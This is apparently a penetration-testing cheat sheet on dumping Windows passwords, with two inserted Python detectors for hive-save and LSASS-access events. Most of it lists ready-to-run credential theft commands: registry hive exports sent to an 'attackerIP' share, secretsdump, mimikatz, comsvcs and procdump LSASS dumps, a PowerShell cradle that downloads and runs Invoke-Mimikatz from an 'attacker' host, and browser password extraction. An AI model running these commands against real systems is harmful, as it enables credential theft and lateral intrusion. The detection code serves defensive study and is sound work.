
CheatSheet - Windows Passwords


SAM

SAM (Security Account Manager) is a database file in Windows that stores local user account credentials, including password hashes, and is used during the local authentication process.

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

reg.py domain.com/user:'Password123'@10.10.10.10 save -keyName 'HKLM\SAM' -o '\\attackerIP\share'
reg.py domain.com/user:'Password123'@10.10.10.10 save -keyName 'HKLM\SYSTEM' -o '\\attackerIP\share'
reg.py domain.com/user:'Password123'@10.10.10.10 save -keyName 'HKLM\SECURITY' -o '\\attackerIP\share'

We use secretsdump from Impacket to extract the password hashes locally.

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Dump hashes remotely with secretsdump

secretsdump.py administrator:Password123@10.10.10.10

Dump with netexec

nxc smb 10.10.10.10 -u administrator -p Password123 --sam

With mimikatz.

mimikatz.exe "privilege::debug" "lsadump::sam" exit
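From the defender's side, every technique in this section starts with exporting the SAM, SYSTEM and SECURITY hives, and the local `reg.exe save hklm\sam` form leaves a process-creation record (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled). The following is an added example, not code from the original post, that flags such command lines in a batch of events. The record field names (`Image`, `CommandLine`, `User`) and the sample events are constructed to resemble that telemetry and are assumptions about your log pipeline; SYSTEM alone is occasionally exported by legitimate administration, so correlate a hit on it with SAM or SECURITY from the same user before escalating.

```python
"""Flag process-creation events whose command line saves the SAM, SYSTEM or
SECURITY registry hives (the `reg save hklm\\sam` pattern from the cheatsheet).

Added example, not from the original post. Input records are constructed in
the shape of Sysmon Event ID 1 / Security 4688 fields (Image, CommandLine,
User); the field names are an assumption about the log pipeline."""
import re

# Matches `reg save HKLM\SAM ...`, `reg.exe export hklm\security ...`,
# tolerant of case, extra whitespace and the HKEY_LOCAL_MACHINE long form.
HIVE_SAVE_RE = re.compile(
    r"\breg(?:\.exe)?\s+(save|export)\s+[\"']?"
    r"(?:hklm|hkey_local_machine)\\(sam|system|security)\b",
    re.IGNORECASE,
)

def classify(event):
    """Return a finding dict for a hive-save command line, else None."""
    m = HIVE_SAVE_RE.search(event.get("CommandLine", ""))
    if not m:
        return None
    return {
        "user": event.get("User", "?"),
        "image": event.get("Image", "?"),
        "hive": m.group(2).upper(),   # SAM, SYSTEM or SECURITY
        "verb": m.group(1).lower(),   # save or export
    }

def detect(events):
    """Return one finding per matching event, in input order."""
    return [f for f in (classify(e) for e in events) if f]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe", "User": "LAB\\alice",
     "CommandLine": r"reg.exe save hklm\sam C:\sam.save"},
    {"Image": r"C:\Windows\System32\reg.exe", "User": "LAB\\alice",
     "CommandLine": r"reg.exe  save  HKEY_LOCAL_MACHINE\SECURITY C:\security.save"},
    {"Image": r"C:\Windows\System32\reg.exe", "User": "LAB\\bob",
     "CommandLine": r"reg.exe query hklm\software\microsoft\windows\currentversion\run"},
    {"Image": r"C:\Windows\System32\cmd.exe", "User": "LAB\\svc",
     "CommandLine": r'cmd.exe /c "reg export HKLM\System C:\Temp\system.hiv"'},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[hive dump] user={f['user']} hive={f['hive']} "
              f"via {f['verb']} ({f['image']})")
```

The remote `reg.py` variant does not run `reg.exe` on the target, so it is not caught by this rule; for that path look at the Remote Registry service being started and at object-access auditing on the hive keys instead.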

LSA

LSA (Local Security Authority) is a Windows component that handles authentication, security policies, and stores secrets like service account passwords and cached credentials.

nxc smb 10.10.10.10 -u administrator -p Password123 --lsa

mimikatz.exe "privilege::debug" "lsadump::secrets" exit

LSASS

Automated

LSASS (Local Security Authority Subsystem Service) is a Windows process responsible for enforcing security policies, handling logins and password changes, and generating access tokens. It keeps live credentials (e.g., passwords, hashes, tickets) in memory for logged-in users.

nxc smb 10.10.10.10 -u administrator -p Password123 -M lsassy

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Manually

Creating dump file

Using GUI

Open Task Manager > select the Processes tab > find and right-click the Local Security Authority Process > select Create dump file

Using CLI

Identify lsass.exe PID

tasklist /fi "imagename eq lsass.exe"
Get-Process lsass

Create dump file

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 668 C:\lsasspower.dmp full
procdump -accepteula -ma lsass lsass.dmp
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://attacker/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Using mimikatz

sekurlsa::minidump lsass.dmp

Extracting secrets

Extract credentials with pypykatz

pypykatz lsa minidump ./lsass.dmp
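Whichever of the dump methods above is used (Task Manager, comsvcs MiniDump, procdump, or mimikatz reading the live process), the common step is opening a handle to lsass.exe with memory-read rights, which Sysmon records as Event ID 10 (ProcessAccess) with the `GrantedAccess` mask and a `CallTrace`. The following is an added example, not code from the original post, that triages such records: it escalates on `PROCESS_ALL_ACCESS`, on a call trace passing through the MiniDumpWriteDump DLLs (`dbghelp.dll` / `dbgcore.dll`), and on any `PROCESS_VM_READ` handle from a source image outside an allowlist. The allowlist entries and the sample events are constructed assumptions; tune the list to the AV/EDR actually present on your hosts. The more durable fix is to run LSASS as a protected process (LSA Protection / RunAsPPL) or behind Credential Guard, which blocks these handles rather than just logging them.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for handles to lsass.exe
that could support a memory dump. Added example, not from the original post;
the input records are constructed and the allowlist is an assumption to tune."""

# Process access rights from winnt.h relevant to reading another process's
# memory. 0x1010 is QUERY_LIMITED_INFORMATION | VM_READ, the minimum a dump needs.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Source images expected to open lsass.exe with read access on a typical host.
# Constructed/illustrative; replace with what your EDR/AV actually uses.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# DLLs that implement MiniDumpWriteDump; their presence in the call trace is a
# strong signal that the handle is being used to write a dump file.
DUMP_DLLS = ("dbghelp.dll", "dbgcore.dll")

def triage(event):
    """Return (severity, reason) for an Event ID 10 record, or None if benign."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    access = int(event.get("GrantedAccess", "0x0"), 16)   # Sysmon logs hex text
    trace = event.get("CallTrace", "").lower()

    if access == PROCESS_ALL_ACCESS:
        return ("high", f"{source} requested PROCESS_ALL_ACCESS on lsass.exe")
    if any(dll in trace for dll in DUMP_DLLS):
        return ("high", f"{source} reached lsass.exe via a MiniDump DLL in the call trace")
    if access & PROCESS_VM_READ:
        if source in ALLOWLIST:
            return None
        return ("medium", f"{source} opened lsass.exe with VM_READ (0x{access:x})")
    return None   # query-only handles without VM_READ cannot read memory

def triage_all(events):
    """(source image, severity, reason) for every suspicious event, in order."""
    out = []
    for e in events:
        r = triage(e)
        if r:
            out.append((e.get("SourceImage"), *r))
    return out

# Constructed samples modelled on Sysmon Event ID 10 fields (not real telemetry).
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\comsvcs.dll+1234"},
    {"SourceImage": r"C:\Temp\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\dbgcore.dll+5a3e"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534"},
    {"SourceImage": r"C:\Windows\System32\notepad.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "GrantedAccess": "0x1410",
     "CallTrace": ""},
]

if __name__ == "__main__":
    for source, severity, reason in triage_all(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}")
```

Expect noise from the allowlist step on real hosts; the two "high" branches (full access, or a MiniDump DLL on the stack) are the ones worth paging on, and a dump file written shortly after such an event (Sysmon Event ID 11 for `*.dmp`) is the natural second signal to correlate.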

Stored credentials

cmdkey /list

Lazagne.exe
mimikatz.exe "privilege::debug" "vault::cred" exit
mimikatz.exe "privilege::debug" "sekurlsa::credman" exit

Browser Passwords

Lazagne.exe

.\SharpChrome.exe logins /unprotect

Misc

Search for passwords in SMB shares.

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

References

https://www.thehacker.recipes

https://www.netexec.wiki/


Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

This post is licensed under CC BY 4.0 by the author.